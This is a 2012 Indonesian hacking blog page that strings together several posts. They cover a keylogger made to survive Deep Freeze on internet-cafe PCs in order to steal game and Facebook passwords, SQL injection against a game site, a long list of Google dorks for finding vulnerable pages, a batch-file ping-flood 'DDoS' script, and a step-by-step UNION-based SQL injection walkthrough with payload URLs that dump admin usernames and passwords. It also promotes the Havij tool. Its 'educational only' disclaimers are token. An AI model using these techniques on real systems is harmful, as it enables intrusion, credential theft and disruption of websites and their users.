Jumat, 28 Desember 2012

Cara Melacak Lokasi Nomor HP Menggunakan HLR Lookup

Home Location Register(HLR) adalah database center yang berisi rincian dari setiap pelanggan telepon selular yang diberi wewenang untuk menggunakan jaringan inti GSM. HLR menyimpan rincian setiap kartu SIM yang dikeluarkan oleh operator telepon seluler. Setiap SIM memiliki identifikasi unik yang disebut IMSI yang merupakan kunci utama untuk setiap record HLR.




Sedangkan HLR Lookup adalah sebuah aplikasi untuk memeriksa di mana nomor telepon yang berasal.HLR Lookup tidak memiliki kemampuan untuk mengetahui rincian sejumlah informasi seperti nama, alamat, posisi, dll, karena maslah privacy dan keamanan maka informasi yang rinci tentang pemilik nomor yang hanya diketahui oleh karyawan pemilik operator telepon seluler dan pihak berwenang .

Dengan menggunakan HLR Lookup kita dapat melacak lokasi (kota) sebuah nomor hp.
HLR Lookup ini hanya bisa mendeteksi no hp operator ponsel berikut:

1. Telekomunikasi Selular [Kartu Halo, Simpati, Kartu AS]
2. Indosat (Cellular) [IM3, Mentari, Matrix]
3. Indosat (Fixed) [Starone]
4. Excelcomindo Pratama [XL]
5. Hutchison CP Telecommunications [Three]
6. Natrindo Telepon Seluler [Axis]
7. Bakrie Telecom [Esia]
8. Telekomunikasi Indonesia [PSTN, Flexi]
9. Mobile-8 Telecom (Cellular) [Fren]
10. Mobile-8 Telecom (Fixed) [Hepi]
11. Smart Telecom [Smart]
12. Sampoerna Telekomunikasi Indonesia [Ceria]
13. Pasifik Satelit Nusantara [Byru]

Untuk mendeteksi lokasi no hp bisa gunakan link berikut melacak lokasi no hp

Untuk menggunakannya cukup masukkan nomor hp ke kotak teks yang tersedia kemudian klik tombol Search , maka akan terdeteksi lokasi nomor hp tersebut lengkap dengan peta.

http://www.cilacaphacker.com/2012/05/cara-melihat-email-pelaku-pemasang-pada.html

Cara Melacak Lokasi No HP Seseoran

Cara Melacak Lokasi No HP Seseorang

-Baca 2x lagi judul postingan diatas keras-keras ( pokoknya harus sampai kedengeran tetangga sebelah )
-Katakan Dalam Hati "software master blog , kini aku percaya bahwa engkau bisa memberitahuku cara melacak lokasi no HP seseorang" 5x
-Download Software Pelacak No HP disini
-Jalankan Softwarenya , masukkan no hpnya , ketahuan dehh sekarang data2 mengenai no HPnya

NB : Anda Tetap Dapat Menggunakan Software Ini Walaupun sedang offline

Nice share , demikian semoga bermanfaat :)

Keylogger Permanen.



Nih ane kasih solusi supaya Keylogger kalian Permanent, biar kalian bebas bisa nyolong password PB, LS, FB, dll. wkwkwk,


Bagi yang suka maling,makanya ane sahre karna ane ngk suka maling...
langsung saja.
[bagi yang suka masang keylogger di warnet tapi kalau pc nya di restar tapi hilang]
Nich solusi nya.

1.agan download 2 file yaitu=>anti depreeze & ardamax keylogger.
2.siap di download,buka anti depreeze nya
3.lalu pilih open new procces.
4.kalau udah di pilih lalu klick dech tombol star
5.ntar keluar menu.
6.klick boot frozen.
7.kalau ente mau ubah passwoard depreeze nya,tinggal klick pass aja.
8.setelah klik boot frozen,restar kompi ente....
9.lihat dech depreeze nya,pasti tidak aktiv

10.langsung ente download keylogger jenis apapun.
11.install keylogger dan lihat tidak akan hilang keylogger anda..

kalau keylogger cari sendiri yah.

Nih antibiotik biar keylogger kalian Permanen: DOWNLOAD
Follow my twitter: @rakaciril2

Jgn lupa FOLLOW blog saya, dan kasih komentar jika membantu.

HACK G-CASH GEMSCOOL [BUG SQL



Nih om...!!! Ane Di sini cuma pengen ngeshare cara HACK cash dari gemscoolnya sendiri..

Jadi, jangan harap agan MINTA LINK, ini Just SHARE...!!! [link'nya ane jual, 50rb aja, bayar lwat REKENING ato pulsa jg bisa] minat wall kesini aja FACEBOOK
Jadi Di sini hanya orang yg ngerti SQLi No Leecher's


Nih barang buktinya om...!!

Sengaja ane tutup ID ane, takut banyak yang mau HACK ID ane pake Pishing... cape dech

MAU DAPAT UANG DARI INTERNET?? KLIK DIBAWAH INI.... SELAIN ITU JUGA ADA INFO LEBIH MENARIK LAINNYA!!!




Langsung ajja om..!!!
Ane Pake WEB orang ajja om..!! Kalo pake Web gemscool nya langsung, takut banyak leecher's yg mendadak menjadi hacker....!!!
Sebenarnya bug SQL pada situs-situs berbasis php sudah lama ditemukan. Karena bug itu sudah lama, jadi sudah tidak banyak lagi situs-situs yang terdapat bug SQL-nya.
Tapi setelah saya coba searching dengan bantuan om Google, ternyata masih ada loh…. ^^. Ada baiknya trik ini dipakai cuman untuk media pembelajaran. Kalaupun nanti anda melakukan lebih dari itu, saya gak tanggung jawab deh! haha….
Nah, seperti pada judul diatas. Kita akan melakukan teknik SQL Injection Union pada situs-situs berbasis php dengan bantuan tools SQLI Helper.

Namun jika anda ingin melakukannya secara manual, anda bisa mencari situs-situs yang mengupas artikel SQL Injection secara manual. Banyak kok…..

Tapi kalau ada yang gampang, ngapain cari yang susah!! Bener gak? Hahahaha….
Ok, kita langsung saja ya…..

Pertama-tama :
Lihat ne ada Log admin


Langkah pertama, download tools SQLI Helper V 2.7 Sizenya gak gede-gede amat kok. Cuman 241 KB. Mau??????? Cari ajja sendiri di Embah Google....wkwkwkwkwk....

Oh ya, ketika anda menjalankan tools ini. Pastikan safety guard/resident shield antivirus anda dalam keadaan nonaktif ya. Soalnya tools ini akan dianggap trojan. Tapi saya jamin, tools ini aman kok. ^^

Langkah kedua, setelah selesai didownload. Buka tools tersebut...!!!

Pada kolom Target, kita akan mengisikan alamat url situs yang kita curigai masih terdapat bug SQL-nya. Namun url yang dijadikan target bukan url seperti biasanya, misalnya : http://duniainternet.info Namun, http://www.er.com.my/Content.php?id=1..

Loh, cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan om Google, apapun yang kita cari bisa kita dapatkan. (berarti bisa tau sapi saya yang ilang dong?).

Buka Google.com. Lalu masukkan script berikut di kotak penelusuran.
Script:[code]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=[code]
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak sih script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda. Sabar aja ya… boong

Langkah ketiga, diumpamakan anda telah memilih satu situs yang akan digunakan sebagai target. Namun kita harus tahu, situs tersebut terdapat bug SQL nya tidak? cara cepat mengetahui situs tersebut vuln terhadapt serangan SQL adalah dengan memberikan tanda ” ‘ “(petik satu) di akhir url tersebut...

Nah, kalau situs itu mengeluarkan pesan error. Maka bisa disimpulkan, situs tersebut masih vuln dengan SQL Injection. Pesan error-nya kurang lebih seperti ini.

Langkah keempat, masukkan url situs tadi ke kolom Target di tools SQLI Helper. Oh ya, tanda petiknya gak usah dipakai lagi ya. Cukup urlnya saja. Ingat….. tanpa tanda petik di akhir url!!

Setelah itu klik Inject.
Seperti di gambar ini :


Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll.
Mantab!! Sekarang saatnya klik Get Database dibawah menu Inject.

Database:

Selanjutnya, klik Database name. Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawag, saya memilih database natural. Selanjutnya klik Get Tables.

Table:

Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin...

Seperti contoh diatas, saya mendapatkan tabel admin_user. Doakan saja terdapt informasi username dan password admin didalam tabel tersebut. Langkah selanjutnya pilih admin_user dan klik Get Coloumns.
GET COLOMN:males masukin gambarnya, coz lama
Dump Now:
Maka dengan segera, informasi mengenai username dan password administrator jatuh ketangan kita. Hahaha….. Gimana, mudah ya? 
Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615
assword tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?
Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, klik [JaMu] hash.
crars:males masukin gambarnya, coz lama
Maka, si password pun muncul….! Passwordnya ternyata admin.
Langkah kelima, jika username dan password situs tersebut sudah ditangan, selanjutnya tinggal mencari form login dari situs tersebut. Misalnya :
* dsb……
Yang pasti, form login tersebut harus kita dapatkan. Entah bagaimanapun caranya….
Masih gak bisa juga??? Ck…ck…ck…. ya udah. Download tools Admin Finder deh kalo anda kesusahan dalam mencari form login situs tersebut. Download klik disini.
Cara kerjanya cukup mudah kok, tinggal masukkan url situs tersebut dan tunggu tools itu bekerja secara otomatis mencari halaman adminnya. Berdoa saja tools tersebut juga menemukannya….
Jrengg….jreng…jrenggg….! Jika anda telah mengetahui username, password, dan halaman admin website tersebut Jika Tidak Anda Kurang Beruntung .. Cari Soft Cybers keluaran Tahun 2011 (Bukan Software C3) . Sekian Saja Dari Ane .. Setengah Aja Ane Terangin... 
Saran saya cuman satu, usahakan jangan merusak tampilan website terseubut. Buat aja halaman baru yang memberitahukan bahwa situs tersebut terdapat bug SQL nya. Ingat dosa om…. !! 
Semoga Membantu!
Artikel: Aris Nugroho

CARA PASANG KEYLOGGER DI CHEAT / INJECTOR



CATATAN: Tutorial ini hanya untuk tujuan Pendidikan yaitu untuk membuat Anda sadar hacker dapat hack 
account . Tolong jangan menyalahgunakan trick ini. Saya tidak bertanggung jawab atas segala kerusakan yang disebabkan oleh Anda.



Bahan 1
Bahan 2
Tutorial
Cara pasang keylogger di injector. 

Cara Membuat Tool DDoS Sederhana dari Notepad




Cara Membuat DDoS Sederhana dari Notepad | Cirebon-Cyber4rt - DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.
Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.
1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad
2. Masukan Kode Berikut Ini :
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)

Sekian saja postingan saya siang ini tentang Cara Membuat Tool DDoS Sederhana dari Notepad, semoga dapat bemanfaat.

Cara Hacking Website dengan teknik SQL Injection


24
Cara Hacking Website dengan teknik SQL InjectionHarap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC
oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data
Download HAVIJ